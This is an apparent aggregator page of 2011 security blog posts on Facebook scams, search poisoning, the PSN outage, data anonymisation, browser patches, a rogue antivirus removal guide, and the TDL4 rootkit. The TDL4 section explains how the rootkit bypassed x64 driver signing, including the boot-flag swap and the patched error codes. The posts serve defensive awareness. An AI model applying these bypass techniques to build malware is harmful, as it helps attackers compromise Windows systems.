Computer Security Articles

Today there are many social networks on the internet and everyday new ones are being introduced with new and better features. They have unique and useful features, which makes it easy for users to remain updated with friends. They also offer apps for different smartphones providing even easier access to friends and other useful information. But at the same time these contacts and important details are also at risk with compromised security features.

Google Vs Facebook

Google and Facebook are two popular corporations offering online social networks and other useful applications. Over the past few years Facebook has gain significant recognition and has received large amount of users from around the world. These users share their private information on the web. There are security features that restrict strangers from accessing personal information but exposing personal data online is still a risk.

On the other hand Google is a popular search engine, which is now stepping in the world of social networks and has started offering new products such as +1, Hangouts and more.

But if you compare these two popular corporations a widely asked question is about their safety. Personal information can be fatal if it gets in wrong hands. Users can restrict others from viewing information by changing their privacy setting. For instance Facebook offer users to set “friends only” and “friends of friends” setting to files, which users can select according to their requirements.

Facebook users can also make groups and set privacy settings to it, and add friends and family to these groups. For instance if someone want to allow a group of people to view “photo album”, then it is good to create a group and allow only this group to view photos or albums.

Google+ Project

Google Corporation launched a project named Google+, which comprises of different smaller projects such as Google Circle. It is a social network and offers same security features of Facebook as “circle”. Google+ project comprises of number of projects such as Hangouts, +1, Circles, Sparks and more. All these applications are interconnected with each other all over the web such as with Google search engines, social networks, likes and video chat. With such a large online project users are more exposed to risk of information getting into wrong hands.

To coup with security risks Google launched different panels to advice users about secured content sharing such as Google Family Safety Center, which allow parents to have control on their children activities. Parents can also contact Google advice board and find the help they want. It is also important to remain cautious from malicious invitations and software downloads. For instance Google Hangout requires installing Adobe Air on the system. It is important to download such applications from authentic or official websites.

Facebook Risks

Facebook is a great way to connect with friends and family, but at the same time there are also band guys getting social on Facebook. An IT security firm reports that users are being spammed or sent malicious codes. Facebook offer good security features to restrict strangers from accessing personal information but unethical activities are still on the rise.

In case you missed it — and you very well might have considering what time this ball got rolling — Sony has officially flipped the switch on the PlayStation Network, restoring service in a limited capacity as a gradually filling map of the United States. charted the progress of the rollout through the night. The map is now fully green, which means firmware update version 3.61 is now available for download to all U.S. users. In addition to online gameplay, the update brings back video rental playback, Music Unlimited on Qriocity, Netflix/Hulu access, Friends Lists, chat, Trophy comparison and PlayStation Home.

The update is a zippy download and installation as of 9:30 a.m. eastern time today, taking no more than 10 minutes to load into your console and do its thing. We’ll see if that changes as more of the country wakes up and tries to bring PS3s back online. In order to complete the update installation, you’ll need to change your password. Not that you wouldn’t want to, since… you know… your private information was compromised and stuff. That said, the real safeguards built into 3.61 are presumably under the hood, since even the most complex password won’t do you a lick of good if all of your info is stolen from the network servers again.

Sony no doubt wants to put this whole unfortunate affair behind it, but there will very likely need to be an extended healing period before consumer confidence can be restored. “Welcome Back” promotions and the like are all well and good, but only time is going to make this mess go away. Look at Microsoft and the whole “Red Ring of Death” circus; slightly different situation but with a similar reach. Both companies made mistakes before stepping up and doing what needed to be done; like Microsoft, Sony’s got a large enough user base that a return to business as usual is a certainty, even if it does take some time.

After all, that new Call of Duty: Black Ops map pack is going to come to PSN at SOME point.

If you are a regular user of Google’s search engine you might have noticed that poisoned search results have practically become a common occurrence.

Google has, of course, noticed this and does its best to mark the offending links as such, but they still have trouble when it comes to cleaning up its image search results.

ISC’s Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and shows that it is actually rather simple.

For one, they attack and compromise a great variety of legitimate websites – usually those which use WordPress, since it often has vulnerabilities that can be easily exploited and the legitimate users are often lax when it comes to updating it.

Then, they introduce PHP scripts in the sites’ source code. “These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content ? if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content,” he explains.

They also harvest other sites for images, and embed them into the site. When the scripts detect Google’s crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database.

“The exploit happens when a user clicks on the thumbnail,” says Zdrnja. “Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background.”

Google displays all of this in an iframe, and the browser automatically sends the request to the compromised page. The PHP script inserted in it checks if the user has come from a Google results page, and if he did, it displays another script – this time it’s a JavaScript one – that redirects the browser to another compromised site that serves malware.

Users should be careful on what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as the NoScript for the Firefox browser, but believes that Google could help by not using an iframe to display the results.

Facebook scammers know that in order to keep users falling for their scams, they have to use a variety of approaches.

For example, there was a time where rogue applications were the scammers’ preferred method of making sure that the scheme is propagated through the social network. Before that, they were more partial to trying to make the users copy/paste scripts into their address bars in order to achieve the same result.

As users become accustomed to ignoring one particular approach – and Facebook is becoming more adept at spotting and blocking the rogue apps – the copy/paste script one makes a comeback.

The most popular lure used by these scammers is the undying “See who viewed your profile” offer. The landing page could be a Facebook one or one hosted on another domain, and it asks the user to copy some Javascript into the browser address bar and press ?Enter?.

And just in case the user does not understand the instructions, the scammers have attached a video of the whole process. Once the directions are executed, the user is (predictably) asked to fill out a survey in order to finally get the results. In the meantime, the Java script works its magic.

“Depending on the configurations of the attacker, the script will post a new bait message to the user?s wall, send chat messages to friends, tag you in post messages or images, or even create an event and send an invitation to all your friends,” explains Symantec.

“Of course as always the attack is easy configurable through a toolkit. Since the script runs in the context of Facebook and uses your open session it can do a lot with your profile, it can do nearly everything you could do yourself.”

Within hours of the announcement of Osama Bin Laden’s death, we are already seeing malicious sites emerge to capitalize on the news. One Spanish language site displays a purported photo of a murdered Osama Bin Laden and includes a story about the US led operation. Farther down the page, the reader is presented with a Flash Player window with a message indicating that the user must first update a VLC plugin, which is a popular media player, in order to view the video. When the user clicks on the link, they will download a file titled XvidSetup.exe. This file is actually a popular adware tool known as hotbar. At present, 19 of 41 antivirus engines are blocking the file.

Sadly, there will be no shortage of scams taking advantage of this historic global news. Users should use caution any time a site claims to be offering video or photos related to this news.

- michael

Dutch GPS and navigation software giant, Tom Tom, recently took what I consider to be a small privacy step for the company, but a giant privacy step for mankind.

Faced with evidence that the Dutch police have been using anonymised trip data from Tom Tom users to assist in enforcing speeding laws, Tom Tom CEO Harold Goddijn last week published an official comment on YouTube.

In the video, Goddijn said:

We learned today…that the police in the Netherlands are using [our] information to identify road stretches where people in general, and on average, are driving too fast. They use [our data] to put up speed cameras and speed traps. And we don’t like that, because our customers don’t like it. We will prevent that type of usage of our data in the future.

Tom Tom seems to be recognising some potential privacy-eroding issues which other companies don’t or haven’t concerned themselves with in the past. (Not all viewers of the YouTube video agree with me – there are currently 34 dislikes but only 26 likes.)

Even so-called anonymous data, collected in good faith, may end up being anything but.

Possibly the most infamous, and outrageous, anonymity gaffe in recent history was perpetrated by AOL nearly five years ago. The company published some 20 million search terms – supposedly for web research purposes – with usernames replaced with arbitrary numbers.

The problem was that each username was replaced with the same number every time it appeared. The result ought to have been foreseen.

As you accumulate more and more search terms tied to specific individuals, you can make ever-more accurate deductions about their identities from the search terms alone.

After all, over months of searching, you probably give away multiple hints about your identity. You might narrow down where you live by repeatedly searching for businesses in your neighbourhood. You might search for cohorts from your school or college. You might check garbage collection dates in your street. You might even do a vanity search for your own name or property, which, in the AOL data, would have been the privacy-erosion equivalent of “Bingo!”

Indeed, the New York Times famously traced Thelma Arnold, and her dog Dudley, right to her home in Georgia by reversing the AOL search data to remove her anonymity altogether.

Google, too, is no stranger to controversy over its definition of anonymise. Google is proud of the fact that it “anonymises” IP addresses in its search logs after nine months, even though this involves simply blanking out the bottom eight bits of your IP address.

This just about sneaks into the definition of anonymise given in my New Oxford American Dictionary, namely: to “remove identifying particulars from test results for statistical or other purposes”. But it might not meet your definition. You probably assume that an anonymised log entry can’t be connected with you at all.

Keeping the actual details of every search term – even ones which actually include your name, or your address, or some sort of personally identifiable information – isn’t really anonymous. Tying these searches together with an IP identifier which narrows you down to 1 in 256 people (at the very best – many /24 networks are only sparsely populated, after all), and which probably identifies your ISP, your suburb and your phone exchange, is even worse.

So, be careful out there. Anonymised data may not be as anonymous as you thought. And anonymised data which you share with a vendor – such as your average speed across the Sydney Harbour Bridge, where you’re supposed to keep below 70km/hr – might end up getting used for purposes you wouldn’t consider “anonymous”.

Unless you are absolutely certain what will be shared, and how, and for what purpose, I recommend that you turn such sharing features off. And if a product or service requires data sharing to work at all, don’t buy into it in the first place.

At the very least, before enabling any “share data with vendor” option, ask yourself, and the vendor, what’s in it for you – in other words, work out the best result you can ever expect from the sharing. Contrast that value with what’s in it for the vendor, or for the intelligence services and law enforcement authorities in that vendor’s jurisdiction.

Make sure there is an obvious positive balance in your favour.

If there isn’t, then the vendor simply isn’t paying you enough for your data. It really is a commercial transaction!

Google’s top-trending Anglophone search term right now is, understandably, “osama bin laden dead”.

Google officially describes its hotness (you couldn’t make this stuff up) as volcanic.

The short version, according to the LA Times, is that bin Laden was tracked to a “comfortable mansion surrounded by a high wall in a small town near Islamabad, Pakistan’s capital.”

For bin Laden, it seems, the comfort is no more. “On Sunday, a ‘small team’ of Americans raided the compound. After a firefight, [President Obama], they killed Bin Laden.” Apparently, DNA tests have confirmed Bin Laden’s identity.

And there you have it.

Now you know – so you don’t need to click on any of the links you’re likely to see in email or on social networking sites offering you additional coverage of this newsworthy event.

Many of the links you see will be perfectly legitimate links. But at least some are almost certain to be dodgy links, deliberately distributed to trick you into hostile internet territory.

If in doubt, leave it out!

And even well-meant searches using your favourite search engine might end in tears. What’s commonly called “Black-Hat Search Engine Optimisation” (BH-SEO) means that cybercrooks can often trick the secret search-ranking algorithms of popular search engines by feeding them fake pages to make their rotten content seem legitimate, and to trick you into visiting pages which have your worst interests at heart.

Well-known topics that have been widely written about for years are hard to poison via BH-SEO. The search engines have a good historical sense of which sites are likely to be genuinely relevant if your interest is searches like “Commonwealth of Australia”, “Canadian Pacific Railway” or “Early history of spam”.

But a search term which is incredibly popular but by its very nature brand new – “Japanese tsunami”, “William and Kate engagement”, “Kate Middleton wedding dress” or, of course “Osama bin Laden dead” – doesn’t give the search engines much historical evidence to go on.

Of course, the search engines want to be known for being highly responsive to new trends – that means more advertising revenue for them, after all – and that means, loosely speaking, that they have to take more of a chance on accuracy.

What can you do to keep safe?

* Don’t blindly trust links you see online, whether in emails, on social networking sites, or from searches. If the URL and the subject matter don’t tie up in some obvious way, give it a miss.

* Use an endpoint security product which offers some sort of web filtering so you get early warning of poisoned content. (Sophos Endpoint Security and Control and the Sophos Web Appliance are two examples.

* If you go to a site expecting to see information on a specific topic but get reidrected somewhere unexpected – to a “click here for a free security scan” page, for instance, or to a survey site, or to a “download this codec program to view the video” page – then get out of there at once. Don’t click further. You’re probably being scammed.

After some months since the last blog post about the TDL rootkit, we have to come back and write again about this nasty threat that is targetting both 32 bit and 64 bit versions of the Windows operating system, succesfully bypassing all the security countermeasures implemented in the 64 bit version of Windows that should prevent the loading of unsigned drivers and every kind of patch to the Windows kernel.

We wrote many times about this rootkit and its features until the last release called TDL4 which is infecting the Master Boot Record, patching in real time the Windows’s Boot Configuration Data and the kdcom.dll kernel debugging module. As already written in the previous blog post about TDL4, this rootkit is able to bypass the Windows Driver Signing security enforcement by patching the Windows Boot Configuration Data and swapping the BcdLibraryBoolean_EmsEnabled value to the BcdOSLoaderBoolean_WinPEMode one.

This swap tells Windows to load itself in WinPE mode, thus disabling the driver signing checks and allowing unsigned drivers from being loaded in kernel mode. Winload.exe is the Windows executable responsible of loading the Windows kernel along with its needed libraries like hal.dll, kdcom.dll etc. When loading such modules, Winload.exe reads the Boot Configuration Data to understand whether it has to check their digital signatures or not – the BcdOSLoaderBoolean_WinPEMode flag (and a couple more flags). After Winload.exe loaded the Windows kernel, it forwards the system loading procedure to the kernel itself.

Here it is the behavior exploited by TDL4 until last April, a design flaw that allowed it to effectively overwrite kdcom.dll module with its own module used to load the rootkit driver and disable kernel debugging. Then, after the rootkit driver has been loaded, the rootkit prevents Windows from actually booting in WinPE mode.

Winload.exe, if executed in WinPE mode, would usually pass the /MININT parameter switch to the Windows kernel, telling it to effectively loads Windows in WinPE mode. To avoid this, the rootkit intercepts the /MININT string and changes it to IN/MINT. The Windows kernel doesn’t recognize such string and loads Windows normally, with driver signing security feature enabled again.

This trick allowed TDL4 rootkit to succesfully infect x64 versions of Windows. Until this April, when Microsoft silently released the KB2506014 patch which is described by the company itself as follows: “Microsoft is announcing the availability of an update to winload.exe to address an issue in driver signing enforcement. While this is not an issue that would require a security update, this update addresses a method by which unsigned drivers could be loaded by winload.exe. This technique is often utilized by malware to stay resident on a system after the initial infection“.

Microsoft patched Winload.exe behavior and kdcom.dll module. The first one is now checking the Windows kernel and its dependencies modules’s code integrity and digital signature disregarding whether the system is being booted in WinPE mode or not. The second one has been patched to evade the TDL4 signature scan which was able to detect when kdcom.dll was being loaded by the system. TDL4 rootkit was checking kdcom.dll’s PE export directory data size in the 32 bit release of Windows and kdcom.dll’s PE resource directory data size in the 64 bit release. If they were equal to 0xFA, then TDL4 assumed the file was kdcom.dll and began the infection routine. Microsoft patched kdcom.dll module and changed the resource directory size to 0×110 to evade from TDL4 scan.

TDL4 authors didn’t wait too long and just released an update to its TDL4 rootkit code, making a number of important changes that are able to bypass the patch issued by Microsoft and a number of TDL rootkit scanners available online. Looks like this new TDL4 dropper is still in development stage because there are some bugs in the dropper code.

This new release of TDL4 rootkit implements specific code to disable the driver signing security routine. As written before, since the last Microsoft patch Winload.exe is checking the digital signature of the kernel and its relative modules. If the integrity check doesn’t succeed – i.e. with the patched rootkit’s kdcom.dll – the security routine returns the status error C0000428, which is STATUS_INVALID_IMAGE_HASH. If the routine returns this error, winload.exe stops the system bootup and shows a security error.

To bypass this security check, the rootkit now intercepts these digital signature check routines and patches them so that instead of returning the NTSTATUS error C0000428, they’ll return the NTSTATUS error 0000C428, which is a non-existant error code. Winload doesn’t recognize such error and goes ahead with the system bootup, effectively loading an unsigned tampered module. To intercept kdcom.dll load, TDL4 rootkit has been updated to the new kdcom’s resource directory size value 0×110, neutralizing the Microsoft patch.

To avoid being detected by some specific online public TDL4 rootkit scanners, the TDL4 team updated their miniport disk driver hook, changing how the rootkit devices are linked to the rootkit driver and the real hooked miniport driver. As we already know, TDL4 rootkit steals the driver object of the last miniport driver and hijacks the disk driver’s DR0 device, attaching it to its own filtering device. By walking the rootkit driver’s chain of devices, it was trivial to get a pointer to the real hooked miniport driver object. This geometric structure helped many tools in spotting the presence of the TDL rootkit active in the system. Current TDL4 release removes every reference to the hooked miniport driver object, bypassing many antirootkit TDL4 detection routines.

The team behind TDL4 rootkit is still alive and is working quietly to keep its creature up to date and always able to bypass all known security restrictions. Even if the rootkit development cycle drastically changed and slowed down since the TDL3 period – mostly because of a major change in the development team – who is handling the rootkit development is still trying to keep the malware alive and effective against security software. Sadly the first x64 compatible Windows kernel mode rootkit has not yet disappeared, it is coming back stronger than before.

From likejacking to photo-tagging, Facebook scammers are constantly searching for new ways to get their scam campaigns to spread through the social network. Early this weekend, we observed a new type of scam, this one leveraging Facebook’s new social plugin for websites that allow for comments. This is being exploited by scammers to get their rogue websites visible on users’ news feeds, because for a scammer, the more eyeballs that see these posts the better.

Familiar Justin Bieber scam returns in a new form

There are various flavors of the scam making the rounds. However, the newest one to make the rounds focuses on a familiar Apple product: the iPhone. With rumors circulating about the iPhone 5, loyal Apple followers are drawn to the various news articles that cover these stories.  So, it’s no surprise that scammers have decided to piggyback on this for their latest scam.

iPhone 5 Scam spreading on Facebook

The scam begins with someone in your social network “commenting” on a post like the one above. The report claims to be from Wired News and has one of those headlines that is used to lure a user into clicking on the link.

iPhone 5 – Scam Page

Once a user clicks on the link, they are redirected to a random .info site. There have been over 10 of these in circulation for this particular scam. Before the user can click on anything, they are asked to answer a CAPTCHA-like verification form:

Human Verification overlay for Facebook Comments

This effectively tricks the user into inputing the number 5, which actually results in the user leaving a comment for the .info website through the use of the Facebook social-plugin layer for comments.  This is why users will see that ‘John Doe’ commented on randomsite.info on their Facebook News Feed.

iPhone 5 Scam Page: Download the ‘Exposure’ Video

Unlike most Facebook scams of late, at the end of this rainbow, there is no survey scam. Instead, the users are prompted to download an executable file.

Installer for ‘videogameboxinstaller.exe’

The executable file is videogameboxinstaller.exe and it is dubious in nature, as it downloads other pieces of software. “AnyLike” claims to allow users to “like” any and everything on the web.

AnyLike Browser Application Installation

“PageRage” allows users to add style to their Facebook pages:

PageRage – Be sure to read the terms!

PageRage notes in its terms above that it will display ads to the end user. Sounds like Adware? Four antivirus vendors agree, flagging this as Adware.Yontoo. This also seems to indicate that there is some affiliate program involved.  And sure enough there is:

Details on how to become an affiliate for PageRage

At the heart of all these Facebook scams lies the same principal: a way for the scammers to make money by tricking users. Survey scams have been working quite well, so it makes sense that scammers would begin focusing their efforts with pay-per-install affiliate programs.

There are other Facebook comment scams (dubbed “comment-jacking”) that are making the rounds, including one regarding Free Airline tickets aboard Southwest Airlines.

Southwest Airlines Comment-Jacking Scam

As we have advocated for many other Facebook scams, the key here is to be aware that scammers will do whatever it takes to make a fast buck on the backs of social networking users. That’s why they tend to jump on topics that might appeal to a user (Apple iPhone 5, Free Airline tickets, etc.).

If it looks too good to be true, there’s a very good chance that it is.  Look out for the people who are apart of your personal social network: friends and family members.  Let them know about scams like these, because awareness remains a big piece of the puzzle.

Note: At the time this blog was published, over 100,000 visits have been logged to the various links in circulation:

Over 100,000 Visits to the various scam pages

Scam Signature Message: 2 FREE Southwest Airline Tickets!

Scam Type: Click-Jacking, Bogus Offer

Trending: May 2011

Why it’s a Scam:

Clicking the wall post link takes you to the  following page: 

Clicking the “Comment” click-jacks your account and presents the following bogus offer:

If you read the fine, you must complete a total of 13 Sponsor Offers. Not only is this a ridiculous hoop to jump through, and will cost you a lot of money in the end, but the scammers are acquiring a treasure trove of your personal data. You will be required to provide your name, address, phone numbers and date of birth. This will enable the shady marketers to not only spam your Facebook account, but also harass you via snail mail, phone calls and text messages.   

How to Deal with the Scam:

If you did make the mistake of commenting on the main page, you are now spamming your friends with the scammer’s message. You should clean-up your newsfeed and profile to remove references to the scam. (click the “x” in the top right hand corner of the post).

The level of damage control required will largely depend on how many “special offers” you participated in. If you submitted your name, address, email, etc., then be on the lookout for more bogus offers arriving in your email and regular mail. Also be on alert for identity theft attempts.

Scam Signature Message: Father walks in on his Daughter… EMBARRASIN!

Scam Type: Survey Scam, Click-Jacking

Trending: May 2011

Why it’s a Scam:

Clicking the wall post link takes you to the  following page: 

On this screen you really don’t have to click the right answer – any input will do. Clicking submit click-jacks your account and loads the following survey scam:

Here we see the end game of a typical Facebook Survey Scam. Each time someone completes a survey, the scam creator gets a commission. The scam creator will possibly have your personal information to do you harm. (depending on the information you submitted in the survey) If you downloaded any games or other files then your computer could be infecting with a virus, trojan or other malware. Never download files from scams like this!   

How to Deal with the Scam:

If you did make the mistake of clicking “Submit” on the main page, you are now spamming your friends with the scammer’s message. You should clean-up your newsfeed and profile to remove references to the scam. (click the “x” in the top right hand corner of the post).

If you made the mistake of submitting your cell phone number for any of the surveys, then you should contact your carrier immediately to keep any bogus charges from appearing.

If you downloaded files or games while completing the survey scam, then your computer could very well be infected with a virus. Install and or update your anti-virus software and run a complete system scan.

I just saw an article by Mathew Schwartz for Information Week focused on a series of articles by Aleksandr Matrosov, Eugene Rodionov and myself for Infosec Institute.

The articles are actually based on previous analyses of TDL3 and TDL4 by Aleksandr and Eugene, but even if you’ve seen those, you might find the aggregation of older and newer information and the separation of the topics useful. Or not. Anyway, the subversion of 64-bit Windows is certainly still an interesting topic.

All three articles are linked on the white papers page at http://www.eset.com/us/documentation/white-papers:

TDSS part 1: The x64 Dollar Question

Considers and contrasts the distribution and installation of the TDL3 and TDL4 bootkits.

TDSS part 2: Ifs and Bots

Looks in more depth at the internals of the TDSS malware.

TDSS part 3: Bootkit on the other foot

The last part of the series describes the TDSS loading process.

Just a few days ago, two major web browsers have been updated to fix security vulnerabilities which may allow attackers to infect the computer with malware just by visiting a hacked website.

Google released version 11 of the Chrome web browser. 18 of the more than 20 security holes which get closed with this release are rated “high”ly critical by the Google developers.

The Mozilla developers also were busy fixing security issues within the Firefox webbrowser (and in the Thunderbird mail program, too). Firefox 4.0.1, 3.6.17 and 3.5.19 fix at least 3 security vulnerabilities.

The updates are either installed automatically or can be obtained with the integrated update mechanism of the software. As the security holes are rated critical, users and administrators should install them as soon as possible!

Dirk Knop
Technical Editor
techblog.avira.com

It’s starting to seem like Facebook can’t win against those who wish to use their service to scam, spam and simply cause trouble. Over the last day or so, a new type of attack has been spreading using the phrase “OMG! I Can’t believe JUSTIN Bieber did THIS to a girl”.

It leads to a page asking you to verify a simple math problem to “prevent bots from slowing down the site”. In actuality, it is another clickjack-type scheme in which you are asked to type the answer into a box.

It doesn’t matter what you type, because it’s a social engineering trick. What you are actually typing is a comment that is used to share the link with your friends on Facebook. You can see the tooltip that says “Add a Comment” in the screenshot.

This bypasses Facebook’s recent attempt at detecting likejacking fraud. Links you comment on are not using the same mechanisms that Facebook is monitoring when you click “Like”.

Many moons ago, the first Facebook attacks started with illegitimate applications asking for permission to access your wall and spread their messages by spamming your friends through wall posts. While this worked well, it was a bit easy for Facebook to track down and remove the bogus apps.

Early in 2010 we saw the first attempts at likejacking. This technique involves layering one image over the top of a Like button and tricking the victim into clicking something that appears to play a video or a continue button, when in fact they are clicking the Like button hidden underneath.

More recently we have seen the attackers trying lots of new techniques. In the past few months we have seen them tagging people in photos they are not in to get you to click, inviting people to fake events and even making you an administrator of a Facebook page that isn’t yours.

While protecting yourself may not be as simple as not clicking anything that says “OMG!” that isn’t a bad start. Be skeptical, understand that messages from your friends may not in fact have been sent to you willingly, and if you are really tempted to click, take a short timeout to conduct a Google/Bing search.

As of the time of this writing some of the YouTube videos this scam leads to have been removed by YouTube. However, one video that is still working has over 525,000,000 views since February and thousands of comments in the last 24 hours — in other words, since this Facebook scam has been making the rounds.

To stay up to date on the latest threats, follow us on Facebook. For advice on how to configure your profile to protect your privacy check out our recommendations for Facebook settings.

Yesterday, five weeks after shipping Firefox 4, the Mozilla project published the new browser’s first-ever security update. The Firefox version number bumps up to 4.0.1.

The update fixes 50-odd bugs in total, amusingly including three fixes listed as specific to OS/2. Ironically, the latest official release of the OS/2 port of Firefox, dubbed Warpzilla, hasn’t yet reached version 4 – it’s still back at version 3.6.8.

The release notes for Firefox 4.0.1 are hard to find from the main Mozilla.com page. (Browsing to Firefox.com doesn’t help, as this just redirects to the Mozilla page.) But if you know where to look, you’ll find that two critical security advisories are fixed in the 4.0.1 release.

MFSA2011-12 deals with memory corruption bugs in the browser engine itself; Mozilla experts officially opined that “with enough effort at least some of these could be exploited to run arbitrary code”. MFSA2011-17 deals with “two crashes that could potentially be exploited to run malicious code” in a graphics library called WebGLES, used by Firefox.

Because the 4.0.1 update addresses vulnerabilities that are considered remotely exploitable, we advise you to apply this update without delay.

The previous version, Firefox 3.6, also gets an update, moving to 3.6.17. This update also squashes some critical bugs, including the MFSA2011-12 memory corruption vulnerability affecting Firefox 4.

Two other critical vulnerabilities which don’t affect version 4 are fixed.

MFSA2011-13 deals with various “dangling pointer” bugs (a dangling pointer is a programming mistake in which a memory reference remains in use after the memory it points to has been returned to the operating system for re-use). MFSA2011-15 deals with a privilege escalation bug in the Java Embedding Plugin.

The MFSA2011-15 vulnerability is specific to the Mac OS X version of Firefox. Apple users who imagine themselves invulnerable simply by virtue of their choice of operating system, please take note!

There’s an update to Mozilla’s Thunderbird email client as well. Thunderbird moves to version 3.1.10.

Somewhat confusingly, the Thunderbird release notes don’t list any critical vulnerabilities fixed in this version, but the MFSA2011-12 advisory specifically states that the bugs it covers are “fixed in Thunderbird 3.0.10″.

If you’re a Thunderbird user, we advise you, too, to update as soon as you can.

Scam Signature Message: OMG! I Can’t believe JUSTIN Bieber did THIS to a girl

Scam Type: Survey Scam, Click-Jacking

Trending: April 2011

Why it’s a Scam:

Clicking the wall post link takes you to the  following page: 

On this screen you really don’t have to click the right answer – any input will do. Clicking submit click-jacks your account and loads the following survey scam:

Here we see the end game of a typical Facebook Survey Scam. Each time someone completes a survey, the scam creator gets a commission. The scam creator will possibly have your personal information to do you harm. (depending on the information you submitted in the survey) If you downloaded any games or other files then your computer could be infecting with a virus, trojan or other malware. Never download files from scams like this!   

How to Deal with the Scam:

If you did make the mistake of clicking “Submit” on the main page, you are now spamming your friends with the scammer’s message. You should clean-up your newsfeed and profile to remove references to the scam. (click the “x” in the top right hand corner of the post).

If you made the mistake of submitting your cell phone number for any of the surveys, then you should contact your carrier immediately to keep any bogus charges from appearing.

If you downloaded files or games while completing the survey scam, then your computer could very well be infected with a virus. Install and or update your anti-virus software and run a complete system scan.

If you or your Facebook friends are falling for tricks like this, it’s time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues.

Antivirus Center is a rogue anti-spyware program from the same family as Internet Protection. This malware is installed onto your computer through the use of fake scanner pages and Trojans that pretend to be updates to Adobe Flash. When Antivirus Center is installed onto a computer it will be configured to start automatically when Windows starts. Once started it will perform a fake scan of your computer and then state that there are numerous infections present. If you attempt to remove any of these so-called infections with the program it will state that it is unable to do so until you purchase it. As none of the infection files actually exist on your computer, please disregard these scan results and do not purchase the program.

 

Antivirus Center screen shot
For more screen shots of this infection click on the image above.
There are a total of 7 images you can view.

 

While Antivirus Center is running it will also display numerous fake security alerts warnings that are designed to make you think that your computer has a severe security problem. The text of these messages are:

Antivirus Center
Your system has come under attack of harmful software. Click here to deactivate it.

Antivirus Center
External software tries to control variety of your system files. This may lead to breaking of some data in your system. Click here to protect remote access to your PC & delete these programs.

Antivirus Center
Spyware.IEMonster process is found. The virus is going to send your passwords from Internet browser (Explorer, Mozilla Firefox, Outlook & others) to the third-parties. Click here for further protection of your data with Antivirus Center.

Antivirus Center Firewall Alert
Suspicious activity in your registry system space was detected. Rogue malware detected in your system. Data leaks and system damage are possible. Please use a deep scan option.

Antivirus Center Firewall Alert
Antivirus Center has prevent a program from accessing the Internet.
“iexplore.exe” is infected with Trojan. This worm has tried to use “iexplore.exe” to connect to remove host and send your credit card information.

Antivirus Center Firewall Alert
Your computer is being attacked from a remote machine!
Block Internet access to your computer to prevent system infection.
Attacker IP: <ip address>
Attack type: RCPT exploit

Antivirus Center
Your computer is under the infections threat. Run instant shield protection to safe your data and prevent internet access to your credit card information. Select this to run instant shield.

Antivirus Center Firewall Alert
Warning
Keylogger activity detected!
Your account in social network is under attack. Click here to block unauthorized modification by removing threats (Recommended)

Just like the scan results, all of these warnings are fake and should be ignored.

As you can see, Antivirus Center was created for one reason; to scare you into thinking your computer is infected so that you will then purchase the program. For no reason should you purchase Antivirus Center, and if you already have, you should contact your credit card company and dispute the charges stating that the program is a computer infection. Finally, to remove this infection, and related malware, please use the removal guide below.

 

Threat Classification:

• Information on Rogue Programs & Scareware

 

Advanced information:

View Antivirus Center files.
View Antivirus Center Registry Information.

 

Tools Needed for this fix:

• Malwarebytes’ Anti-Malware

 

Symptoms that may be in a HijackThis Log:

O4 – HKCU\..\Run: [<random numbers and characters>] rundll32.exe “C:\Documents and Settings\All Users\Application Data\<random numbers and characters>.dat”, <random characters> 04/29/11 – Initial guide creation.

 

Guide Updates:

04/29/11 – Initial guide creation.

 

---

Automated Removal Instructions for Antivirus Center using Malwarebytes’ Anti-Malware:

 

1. Print out these instructions as we may need to close every window that is open later in the fix.
   
   
2. Reboot your computer into Safe Mode with Networking. To do this, turn your computer off and then back on and immediately when you see anything on the screen, start tapping the F8 key on your keyboard. Eventually you will be brought to a menu similar to the one below:
   
   
   
   
   Using the arrow keys on your keyboard, select Safe Mode with Networking and press Enter on your keyboard. If you are having trouble entering safe mode, then please use the following tutorial: How to start Windows in Safe Mode
   
   Windows will now boot into safe mode with networking and prompt you to login as a user. Please login as the same user you were previously logged in with in the normal Windows mode. Then proceed with the rest of the steps.
   
   
3. It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested in this guide on another computer and then transfer them to the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.
   
   
4. Before we can do anything we must first end the processes that belong to Antivirus Center so that it does not interfere with the cleaning procedure. To do this, please download RKill to your desktop from the following link.
   
   RKill Download Link – (Download page will open in a new tab or browser window.)
   
   When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.
   
   
5. Once it is downloaded, double-click on the iExplore.exe icon in order to automatically attempt to stop any processes associated with Antivirus Center and other Rogue programs. Please be patient while the program looks for various malware programs and ends them. When it has finished, the black window will automatically close and you can continue with the next step. If you get a message that RKill is an infection, do not be concerned. This message is just a fake warning given by Antivirus Center when it terminates programs that may potentially remove it. If you run into these infections warnings that close RKill, a trick is to leave the warning on the screen and then run RKill again. By not closing the warning, this typically will allow you to bypass the malware trying to protect itself so that RKill can terminate Antivirus Center . So, please try running RKill until the malware is no longer running. You will then be able to proceed with the rest of the guide. Do not reboot your computer after running RKill as the malware programs will start again.
   
   If you continue having problems running RKill, you can download the other renamed versions of RKill from the RKill download page. Both of these files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.
   
   
6. Now you should download Malwarebytes’ Anti-Malware, or MBAM, from the following location and save it to your desktop:
   
   Malwarebytes’ Anti-Malware Download Link (Download page will open in a new window)
   
   
   
7. Once downloaded, close all programs and Windows on your computer, including this one.
   
   
8. Double-click on the icon on your desktop named mbam-setup.exe. This will start the installation of MBAM onto your computer.
   
   
9. When the installation begins, keep following the prompts in order to continue with the installation process. Do not make any changes to default settings and when the program has finished installing, make sure you leave both the Update Malwarebytes’ Anti-Malware and Launch Malwarebytes’ Anti-Malware checked. Then click on the Finish button. If MalwareBytes’ prompts you to reboot, please do not do so.
   
   
10. MBAM will now automatically start and you will see a message stating that you should update the program before performing a scan. As MBAM will automatically update itself after the install, you can press the OK button to close that box and you will now be at the main program as shown below.
    
    
    
    
    
